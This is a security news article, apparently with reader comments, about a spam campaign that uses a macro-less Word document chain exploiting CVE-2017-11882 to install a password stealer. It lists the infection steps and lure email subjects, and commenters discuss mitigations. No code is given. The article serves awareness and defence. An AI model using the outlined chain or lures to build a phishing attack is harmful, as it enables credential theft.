Spam distributors are using a new technique to infect users with malware, and while this attack relies on having users open Word documents, it does not involve users having to allow the execution of macro scripts.
This new macro-less technique is currently under active exploitation, being detected by Trustwave SpiderLabs researchers in an ongoing malware campaign.
The company says crooks are using this multi-phase, no-macros technique to infect users with a password stealer. Currently, evidence suggests only one group is using this novel trick, albeit this will surely be adopted by others.
New technique's exploitation chain
The actual exploitation chain is detailed below and relies on a large number of resources, such as DOCX, RTF, HTA, VBScript, and PowerShell.
⏩ Victim downloads and opens the DOCX file.
⏩ DOCX file contains an embedded OLE object.
⏩ OLE object downloads and opens an RTF (disguised as a DOC) file.
⏩ DOC file uses CVE-2017-11882 Office Equation Editor vulnerability.
⏩ Exploit code runs an MSHTA command line.
⏩ MSHTA command line downloads and runs an HTA file.
⏩ HTA file contains a VBScript that unpacks a PowerShell script.
⏩ PowerShell script downloads and installs the password stealer.
⏩ Malware steals passwords from browsers, email and FTP clients.
⏩ Malware uploads data to a remote server.
Trustwave says it seen this trick being used with malicious documents arriving via emails with the following subject lines, albeit many will likely change by tomorrow or next week.
TNT STATEMENT OF ACCOUNT – {random numbers}...............
Request for Quotation (RFQ) - < {random numbers} >
Telex Transfer Notification
SWIFT COPY FOR BALANCE PAYMENT
The only way to stay safe if users somehow break this new technique's exploitation chain. The easiest way is to keep Windows and Office up to date.
Microsoft's January 2018 Patch Tuesday security updates included a patch that removed part of the Equation Editor's functionality in order to mitigate CVE-2017-11882.
IOCs are available in the Trustwave report detailing this new attack.
Comments
tomthegeek - 6 years ago
We have macros locked down naturally (yes, I know it doesn't use macros). But we also have some SRP's in effect which prohibit programs from firing up from %temp% directories. I'm wondering if that would help mitigate this threat? Because most of my users love to view or open a doc straight from the email itself. (at least with office 2010) those would be from a %temp% directory. Do you know if the SRP would help in this situation?
JohnnyJammer - 6 years ago
"We have macros locked down naturally (yes, I know it doesn't use macros). But we also have some SRP's in effect which prohibit programs from firing up from %temp% directories. I'm wondering if that would help mitigate this threat? Because most of my users love to view or open a doc straight from the email itself. (at least with office 2010) those would be from a %temp% directory. Do you know if the SRP would help in this situation? "
That wont stop it mate, you are half way there but this doesnt use a macro. Best thing to do is what i have already done a long time ago, disable scripting using NoScript, create GPO to make sure that vbs,hta,ace,jse,js,,wsh,wsf,vbe all open it notepad so that way they cannot execute.
Then like you have done, disallow all them file extentions again from running in %TMP%\*.*\ and also .exe files etc etc.
Ensure no user has admin access both local and domain. Then sit back and laugh at all these trojans trying to get access and only open in notepad lol.